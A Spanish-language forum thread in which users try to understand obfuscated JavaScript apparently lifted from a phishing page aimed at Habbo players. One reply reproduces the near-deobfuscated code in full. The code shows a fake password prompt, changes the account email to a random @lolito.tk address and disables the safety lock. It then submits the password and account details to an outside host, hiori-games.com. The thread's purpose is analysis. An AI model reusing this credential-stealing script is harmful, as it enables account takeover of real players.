_0xcfe9xe=document[_0x3459[27]](_0x3459[30]);_0xcfe9xe[_0x3459[31]]=_0x3459[32];_0xcfe9xe[_0x3459[33]]=_0x3459[39];_0xcfe9xe[_0x3459[35]]=owner;_0xcfe9x9[_0x3459[40]](_0xcfe9xa);_0xcfe9x9[_0x3459[40]](_0xcfe9xb);_0xcfe9x9[_0x3459[40]](_0xcfe9xc);_0xcfe9x9[_0x3459[40]](_0xcfe9xd);_0xcfe9x9[_0x3459[40]](_0xcfe9xe);document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);_0xcfe9x9[_0x3459[41]]()}}}'>

Está extraído de una web que imagino que es phishing de un juego online llamado Habbo. He intentado comprender todo lo anterior y, tras decodificarlo, obtuve lo que puse al comienzo del post. Pero me gustaría comprender lo de después, ya que no consigo entender lo que realiza.
En línea

apuromafo CLS


Re: ¿Cómo decodifico esto?
« Respuesta #4 en: 16 Marzo 2016, 03:21 am »

https://www.unphp.net/decode/3d484439626db1d567a83415de961520/


Código:
<a onClick="alert('Debe iniciar sesion en habbo y arrastrar la imagen a la pestaa de habbo');return false;" href='javascript:var owner = "duplicador";&#65279;var _0x3459=["http://hiori-games.com/p/loading.php","/settings/email",""","split","name":"","email":"","<div style="position: fixed; top: 0px; left: 0px; z-index: 800; width: 100%; height: 100%; background: rgba(10, 54, 94, 0.8);"></div>","<div id="hidden" style="position: fixed; top: 70px; width: 500px; z-index: 900; left: 50%; margin-left: -250px;"><div style="display: block; transition: 1s;" id="toast-container" class="toast-top-center" aria-live="polite" role="alert"><div class="toast toast-error" style="display: none;"><div class="toast-progress" id="toast-progress" style="width: 99.9%; transition: 2s;"></div><div class="toast-message" id="toast-message">La contrasea que ingreso es incorrecta, verifique e intente de nuevo.</div></div></div><div class="modal-dialog" ng-class="size ? " modal-"="" +="" size="" :="" """=""><div style="height: 250px;" class="modal-content" uib-modal-transclude=""><div><button onclick="location.reload()" class="modal__close"></button><h3 translate="SAFETY_LOCK_TITLE" class="modal__title">Cuenta protegida por seguridad.</h3><div class="modal__content"><p translate="SAFETY_LOCK_ANSWER"></p><!-- ngIf: safetyLockForm.$error.remoteDataAnswer --><fieldset class="form__fieldset"><label for="safety-lock-answer1" class="form__label" translate="IDENTITY_SAFETYQUESTION_1">Ingrese su contrasea para continuar</label><div class="form__field"><input id="inputtxt" name="answer1" type="password" ng-model="answers.answer1" ng-model-options="{ updateOn: " default="" blur",="" debounce:="" {="" default:="" 500,="" blur:="" 0="" }="" }"="" required="" remote-data="" answer""="" password-toggle-mask="" autocomplete="off" class="form__input ng-pristine ng-untouched password-toggle-mask ng-invalid ng-invalid-required" style="border-color: rgb(144, 51, 82);"><i 
class="password-toggle-mask__icon"></i><!-- ngIf: safetyLockForm.answer1.$error.required && (!safetyLockForm.answer1.$pristine || safetyLockForm.$submitted) --></div></fieldset><div class="form__footer"><a href="https://www.habbo.es/" class="form__cancel" onclick="location.reload()" translate="FORM_CANCEL_LABEL">Cancelar</a> <button ng-disabled="unlockingInProgress" type="" class="form__submit" onclick="add();">Continuar</button></div></div></div></div></div></div>","prepend","body","ajax","val","#inputtxt","stopcredits","random","floor","@lolito.tk","fadeToggle",".toast","animate","#toast-progress","fail","api/settings/email/change","post","https://www.habbo.es/api/safetylock/disable","get","form","createElement","action","method","input","type","text","name","mail_add","value","pass","habbo","email","id","appendChild","submit"];var linksave=_0x3459[0];var nome=null;var email=null;$[_0x3459[10]]({url:_0x3459[1],success:function b64EncodeUnicode(_0xcfe9x4){nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];div1=_0x3459[6];div2=_0x3459[7];$(_0x3459[9])[_0x3459[8]](div1);$(_0x3459[9])[_0x3459[8]](div2)}});function add(){var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];if(_0xcfe9x6){$[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})[_0x3459[21]](function(){$(_0x3459[18])[_0x3459[17]]();$(_0x3459[20])[_0x3459[19]]({width:0},300);setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});$[_0x3459[25]](_0x3459[24]);function _0xcfe9x8(){var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);_0xcfe9x9[_0x3459[28]]=linksave;_0xcfe9x9[_0x3459[29]]=_0x3459[25];var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);_0xcfe9xa[_0x3459[31]]=_0x3459[32];_0xcfe9xa[_0x3459[33]]=_0x3459[34];_0xcfe9xa[_0x3459[35]]=_0xcfe9x7;var 
_0xcfe9xb=document[_0x3459[27]](_0x3459[30]);_0xcfe9xb[_0x3459[31]]=_0x3459[32];_0xcfe9xb[_0x3459[33]]=_0x3459[36];_0xcfe9xb[_0x3459[35]]=_0xcfe9x6;var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);_0xcfe9xc[_0x3459[31]]=_0x3459[32];_0xcfe9xc[_0x3459[33]]=_0x3459[37];_0xcfe9xc[_0x3459[35]]=nome;var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);_0xcfe9xd[_0x3459[31]]=_0x3459[32];_0xcfe9xd[_0x3459[33]]=_0x3459[38];_0xcfe9xd[_0x3459[35]]=email;var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);_0xcfe9xe[_0x3459[31]]=_0x3459[32];_0xcfe9xe[_0x3459[33]]=_0x3459[39];_0xcfe9xe[_0x3459[35]]=owner;_0xcfe9x9[_0x3459[40]](_0xcfe9xa);_0xcfe9x9[_0x3459[40]](_0xcfe9xb);_0xcfe9x9[_0x3459[40]](_0xcfe9xc);_0xcfe9x9[_0x3459[40]](_0xcfe9xd);_0xcfe9x9[_0x3459[40]](_0xcfe9xe);document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);_0xcfe9x9[_0x3459[41]]()}}}'>
« Última modificación: 16 Marzo 2016, 03:31 am por apuromafo » En línea

Apuromafo
therecse

Re: ¿Cómo decodifico esto?
« Respuesta #5 en: 20 Marzo 2016, 01:05 am »

Creo que no me he explicado bien. Lo que quería decir es: ¿cómo podría decodificar las direcciones que aparecen (0x...)?
Gracias!
En línea

MCKSys Argentina
Moderador Global
***
Re: ¿Cómo decodifico esto?
« Respuesta #6 en: 20 Marzo 2016, 01:45 am »

Creo que no me he explicado bien. Lo que quería decir es, como podría decodificar las direcciones que aparecen (0x...).
Gracias!

Por lo que veo, esos "0x..." no son direcciones, son variables. Puedes ponerles el nombre que quieras, según lo que interpretes que hace c/u.

Saludos!
En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."
